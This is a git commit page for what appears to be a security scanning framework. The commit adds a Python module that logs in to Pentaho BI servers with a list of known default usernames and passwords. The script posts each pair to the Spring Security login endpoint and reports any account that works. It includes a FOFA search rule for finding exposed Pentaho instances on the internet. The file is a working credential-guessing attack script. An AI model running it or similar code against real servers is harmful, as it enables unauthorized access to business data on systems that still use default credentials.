pentaho
添加pentaho用户名密码的爆破
This commit is contained in:
ZiYuMis
BIN
.vs/slnx.sqlite
Normal file
BIN
.vs/slnx.sqlite
Normal file
Binary file not shown.
42
Moudle/pentaho/pentaho_bruteforce.py
Normal file
42
Moudle/pentaho/pentaho_bruteforce.py
Normal file
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/env python3
|
||||
# _*_ coding:utf-8 _*_
|
||||
|
||||
import requests
|
||||
from Config.config_requests import ua
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
# 脚本信息
|
||||
######################################################
|
||||
NAME = 'pentaho_bruteforce'
|
||||
AUTHOR = "Trans"
|
||||
REMARK = 'pentaho密码爆破'
|
||||
FOFA_RULE = 'app="pentaho"'
|
||||
######################################################
|
||||
|
||||
def poc(target):
|
||||
result={}
|
||||
url = target + "/pentaho"
|
||||
refer = url+ "/Login"
|
||||
url += "/j_spring_security_check"
|
||||
login_headers = {
|
||||
"User-Agent": ua,
|
||||
"Referer": refer
|
||||
}
|
||||
|
||||
webapp_usernames = {'admin':'password', 'joe': 'password', 'suzy': 'password', 'tiffany':'password', 'pat': 'password' }
|
||||
for user in webapp_usernames:
|
||||
path_store = ['/public/plugin-samples', '/public/bi-developers']
|
||||
login_data = {"j_username": user, "j_password": webapp_usernames[user], "locale": "en_US"}
|
||||
response = requests.post(url, headers=login_headers, data=login_data,verify=False,timeout=5)
|
||||
if '/Home' in response.url:
|
||||
print('Logging in as '+ user + ' / ' + webapp_usernames[user])
|
||||
result['target'] = target
|
||||
result['username'] = user
|
||||
result['password'] = webapp_usernames[user]
|
||||
return result
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
poc("http://127.0.0.1:3312")
|
||||
|
||||
Reference in New Issue
Block a user